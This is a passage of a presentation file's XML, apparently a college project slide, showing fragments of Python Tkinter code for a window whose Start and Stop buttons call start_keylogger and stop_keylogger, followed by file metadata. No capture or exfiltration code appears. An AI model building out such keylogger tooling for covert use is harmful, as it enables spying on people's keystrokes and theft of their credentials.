              <a:t>(anchor=CENTER)</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label.pack</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text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</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start_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=LEFT)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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Stop", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, state='disabled')</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stop_button.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(side=RIGHT)</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root.geometry</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("250x250")</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.mainloop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B060402020202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kings engineering college</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-05-26T05:50:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-15T05:44:49Z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9d6dd5a55b8a40ddb4014154eac7b05e</vt:lpwstr>
  </property>
</Properties>
</file>